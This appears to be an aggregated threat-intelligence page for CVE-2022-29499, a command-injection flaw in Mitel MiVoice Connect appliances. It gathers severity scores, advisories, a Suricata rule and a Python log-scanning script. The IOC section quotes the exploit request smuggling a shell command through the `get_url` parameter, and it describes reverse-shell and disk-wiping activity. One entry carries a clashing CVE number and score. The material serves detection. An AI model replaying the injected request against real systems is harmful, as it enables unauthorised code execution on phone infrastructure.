CVE-2022-29499
Published 2022-04-26
Priority P195 · critical · 9.8 · CVSS 3.1
CVSS 3.1 vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Tags: KEV · ITW · Ransomware
CISA Known Exploited Vulnerability, due 2022-07-18
Exploited in the wild
EPSS: 56.97% (98.9th percentile)
The Service Appliance component in Mitel MiVoice Connect through 19.2 SP3 allows remote code execution because of incorrect data validation. The Service Appliances are SA 100, SA 400, and Virtual SA.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mitel | mivoice_connect | <= 22.20.2300.0 | — |
Detection & IOCs (extracted from sources)
URL: GET /scripts/vtest.php?get_url=http://127.0.0.1/ucbsync.php%3fcmd=syncfile:db_files/favicon.ico:2.2.256.2/%24%50%57%44%7c%73%68%7c%3f HTTP/1.1
- The exploit targets the `get_url` parameter in `/scripts/vtest.php` on Mitel MiVoice Connect appliances, chaining through `/ucbsync.php` with a `syncfile` command that injects shell commands via `$PWD|sh|?` to achieve RCE and establish a reverse shell.
- Threat actor performed anti-forensic wiping using `dd` to overwrite disk space and `rm` to delete files from the VOIP device filesystem after detection; look for `dd` writing to `/tmp/2` and mass `rm` activity on Mitel appliances.
- Post-exploitation tools Chisel and FileZilla were used by Lorenz actors for pivoting, tunneling, and data exfiltration after gaining initial access via CVE-2022-29499.
- Check Point IPS signature 'Mitel MiVoice Connect Command Injection (CVE-2022-29499)' can be used as a detection reference for network-level detection of exploit attempts.
- The responses to the outbound exploit requests demonstrated that the attacker used the exploit to create a reverse shell; monitor Mitel appliances for unexpected outbound connections following requests to `/scripts/vtest.php` or `/ucbsync.php`.
- The IP addresses shown in the exploit log entries (1.1.256.1 and 2.2.256.2) are invalid/obfuscated addresses used in the CrowdStrike write-up for redaction purposes and are NOT real attacker infrastructure IOCs.
- Affected products are specifically the Service Appliance (SA) components: SA 100, SA 400, and Virtual SA in Mitel MiVoice Connect through version 19.2 SP3; scope detection rules accordingly.
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | 2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C |
| vulncheck | — | 9.8 | CRITICAL | — |
| cisa | — | 9.8 | CRITICAL | — |
CISA
Mitel MiVoice Connect Data Validation Vulnerability
cisa·2022-06-27·CVSS 9.8
CVE-2022-29499 [CRITICAL] CWE-20 Mitel MiVoice Connect Data Validation Vulnerability
Vulnerability: Mitel MiVoice Connect Data Validation Vulnerability
Affected: Mitel MiVoice Connect
The Service Appliance component in Mitel MiVoice Connect allows remote code execution due to incorrect data validation.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2022-29499
Remediation Due Date: 2022-07-18
GHSA
GHSA-f4rg-w9qm-5f42: The Service Appliance component in Mitel MiVoice Connect through 19
ghsa_unreviewed·2022-04-27
CVE-2022-29499 [CRITICAL] CWE-20 GHSA-f4rg-w9qm-5f42: The Service Appliance component in Mitel MiVoice Connect through 19
The Service Appliance component in Mitel MiVoice Connect through 19.2 SP3 allows remote code execution because of incorrect data validation. The Service Appliances are SA 100, SA 400, and Virtual SA.
VulnCheck
Mitel MiVoice Connect Data Validation Vulnerability
vulncheck·2022·CVSS 9.8
CVE-2022-29499 [CRITICAL] CWE-20 Mitel MiVoice Connect Data Validation Vulnerability
Mitel MiVoice Connect Data Validation Vulnerability
The Service Appliance component in Mitel MiVoice Connect allows remote code execution due to incorrect data validation.
Affected: Mitel MiVoice Connect
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.crowdstrike.com/blog/novel-exploit-detected-in-mitel-voip-appliance/; https://therecord.media/ransomware-groups-targeting-mitel-voip-zero-day/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/; https://www.ivanti.com/resources/v/doc/pr-survey-report/ransomware-quarterly-indexreport_q2-q3; https://www.hhs.gov/sites/default/files/lorenz-analyst-note.pdf;
Suricata
ET EXPLOIT Attempted Mitel MiVoice Connect Data Validation RCE Inbound (CVE-2022-29499)
suricata·2022-06-24·CVSS 9.8
CVE-2022-29499 [CRITICAL] ET EXPLOIT Attempted Mitel MiVoice Connect Data Validation RCE Inbound (CVE-2022-29499)
ET EXPLOIT Attempted Mitel MiVoice Connect Data Validation RCE Inbound (CVE-2022-29499)
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT Attempted Mitel MiVoice Connect Data Validation RCE Inbound (CVE-2022-29499)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/scripts/vtest.php?get_url=http://127.0.0.1/ucbsync.php?cmd=syncfile:db_files/"; http.header_names; to_lowercase; content:!"|0d 0a|referer|0d 0a|"; reference:url,www.crowdstrike.com/blog/novel-exploit-detected-in-mitel-voip-appliance/; reference:cve,2022-29499; classtype:attempted-admin; sid:2037121; rev:2; metadata:attack_target Networking_Equipment, created_at 2022_06_24, cve CVE_2022_29499, deployment Perimeter, deployment SSLDecrypt, performance_impact Low, confidence High, signa
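The Detection & IOCs notes above and the Suricata signature describe the same request shape: `/scripts/vtest.php` with a `get_url` that points the appliance back at its own `/ucbsync.php` with a `cmd=syncfile:...` argument, followed on the host by `dd` writes into `/tmp` and a burst of `rm` calls. The following is an added example for defenders, not code from CrowdStrike, Emerging Threats or this page, showing how a log reviewer can apply both checks offline. Everything in it is constructed: the access-log and process-log lines, the 203.0.113.x documentation addresses, the `EXAMPLE` placeholder standing in for the redacted tail of the real request, and the `RM_THRESHOLD` value. The Suricata rule matches the percent-decoded `?cmd=` form, so the access-log check decodes the `get_url` value once before comparing, which is why the logged `%3fcmd=` variant is still caught.

```python
"""Detection helpers for the CVE-2022-29499 exploit shape (web side) and the
anti-forensic behaviour noted in the IOC list (host side). Example code only;
all sample lines and addresses below are constructed, not real IOCs."""
import re
import shlex
from urllib.parse import parse_qs, urlsplit

VTEST_PATH = "/scripts/vtest.php"   # entry point named on the page
UCBSYNC_PATH = "/ucbsync.php"       # inner target named on the page
RM_THRESHOLD = 20                   # constructed; tune to the appliance's baseline

# Combined Log Format request line: client, timestamp, method and target.
ACCESS_LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)

# Constructed access-log lines; 203.0.113.0/24 is a documentation range.
SAMPLE_ACCESS_LOG = [
    '203.0.113.10 - - [24/Jun/2022:10:01:02 +0000] "GET /scripts/vtest.php'
    '?get_url=http://127.0.0.1/ucbsync.php%3fcmd=syncfile:db_files/favicon.ico:EXAMPLE'
    ' HTTP/1.1" 200 512 "-" "curl/7.68.0"',
    '203.0.113.11 - - [24/Jun/2022:10:01:03 +0000] "GET /scripts/vtest.php'
    '?get_url=http://127.0.0.1/index.php HTTP/1.1" 200 128 "-" "Mozilla/5.0"',
    '203.0.113.12 - - [24/Jun/2022:10:01:04 +0000] "GET /index.html HTTP/1.1"'
    ' 200 4096 "-" "Mozilla/5.0"',
]

# Constructed process-audit lines: "<timestamp> <user> <command line>".
# /tmp/2 is the dd destination the IOC list says to look for.
SAMPLE_PROCESS_LOG = [
    "2022-06-24T10:05:01 root ls -la /tmp",
    "2022-06-24T10:05:07 root dd if=/dev/zero of=/tmp/2 bs=1M",
] + [
    f"2022-06-24T10:05:{10 + i:02d} root rm -f /var/log/constructed-{i}.log"
    for i in range(25)
]


def parse_request_line(line):
    """Return client/ts/method/target from one access-log line, or None."""
    m = ACCESS_LOG_RE.match(line)
    return m.groupdict() if m else None


def classify_request(target):
    """Return the inner syncfile command when the request matches the exploit
    shape (vtest.php -> get_url -> ucbsync.php?cmd=syncfile:...), else None."""
    outer = urlsplit(target)
    if outer.path != VTEST_PATH:
        return None
    # parse_qs percent-decodes once, so '%3fcmd=' inside get_url becomes '?cmd='
    get_url = parse_qs(outer.query).get("get_url", [None])[0]
    if not get_url:
        return None
    inner = urlsplit(get_url)
    if not inner.path.endswith(UCBSYNC_PATH):
        return None
    cmd = parse_qs(inner.query).get("cmd", [""])[0]
    return cmd if cmd.startswith("syncfile:") else None


def scan_access_log(lines):
    """Collect requests that match the exploit shape."""
    hits = []
    for line in lines:
        req = parse_request_line(line)
        if not req:
            continue
        cmd = classify_request(req["target"])
        if cmd is not None:
            hits.append({"client": req["client"], "ts": req["ts"], "cmd": cmd})
    return hits


def scan_process_log(lines, rm_threshold=RM_THRESHOLD):
    """Flag dd writing under /tmp and a burst of rm invocations."""
    findings = []
    rm_count = 0
    for line in lines:
        try:
            ts, user, cmdline = line.split(maxsplit=2)
            argv = shlex.split(cmdline)
        except ValueError:
            continue  # malformed line; skip rather than abort the scan
        if not argv:
            continue
        if argv[0] == "dd" and any(a.startswith("of=/tmp/") for a in argv[1:]):
            findings.append(("dd_tmp_write", ts, user, cmdline))
        elif argv[0] == "rm":
            rm_count += 1
            if rm_count == rm_threshold:
                findings.append(("mass_rm", ts, user, f"{rm_count} rm invocations"))
    return findings


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_ACCESS_LOG):
        print("exploit-shaped request:", hit)
    for finding in scan_process_log(SAMPLE_PROCESS_LOG):
        print("host finding:", finding)
```

Because `classify_request` checks the decoded structure of `get_url` rather than a literal substring, it reports the same event whether the inner `?` was logged encoded or not, and `scan_process_log` raises the mass-`rm` finding exactly once when the count crosses the threshold, so a single wiping episode does not flood the reviewer with repeats.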
No public exploits indexed.
Sentinelone
Lorenz
blogs_sentinelone·2022-11-30
Checkpoint
19th September – Threat Intelligence Report
blogs_checkpoint·2022-09-19
CVE-2022-29499 19th September – Threat Intelligence Report
## 19th September – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 19th September, please download our Threat Intelligence Bulletin.
Top Attacks and Breaches
Uber has suffered a data breach, allegedly by an 18-year-old hacker who managed to gain access using social engineering tactics on an employee. The hacker claims to have access to Uber’s internal IT systems and to the company’s HackerOne bug bounty account, which contains vulnerabilities in Uber’s systems and apps, di
Checkpoint
27th June – Threat Intelligence Report
blogs_checkpoint·2022-06-27·CVSS 9.8
CVE-2022-29499 [CRITICAL] 27th June – Threat Intelligence Report
## 27th June – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 27th June, please download our Threat Intelligence Bulletin.
Top Attacks and Breaches
A Chinese APT group dubbed Bronze Starlight (APT10) is attempting to use ransomware attacks mainly against Japanese companies, only as decoy to hide its true objectives – intellectual property theft and cyber espionage.
Check Point Threat Emulation provides protection against this threat (Ransomware.Win.Pandora.A)
The Russian
Sentinelone
Lorenz
blogs_sentinelone·CVSS 9.8
[CRITICAL] Lorenz
# Lorenz Ransomware: In-Depth Analysis, Detection, and Mitigation
## Summary of Lorenz Ransomware
Lorenz ransomware was first spotted in early 2021. Since then, its features have developed to match those of other widely known ransomware families. Lorenz campaigns are highly targeted, with payloads often tailored to their intended victims. The ransomware’s operators use a multi-pronged extortion method, hosting a blog with the names of victims and leaked data for those who don’t pay. It’s worth noting that victims’ names are posted on the blog as soon as data has been taken from the target system, regardless of whether payment is made or not.
## What Does Lorenz Ransomware Target?
Lorenz ransomware targets a variety of industries, including healthcare, finance, education, and government. Lorenz
Crowdstrike
Novel Exploit in Mitel VOIP Appliance
blogs_crowdstrike·CVSS 7.5
CVE-2026-20929 [HIGH] Novel Exploit in Mitel VOIP Appliance
Timeline
- 2022-04-26: Published
- 2022-06-27: Added to CISA KEV
- Exploited in the wild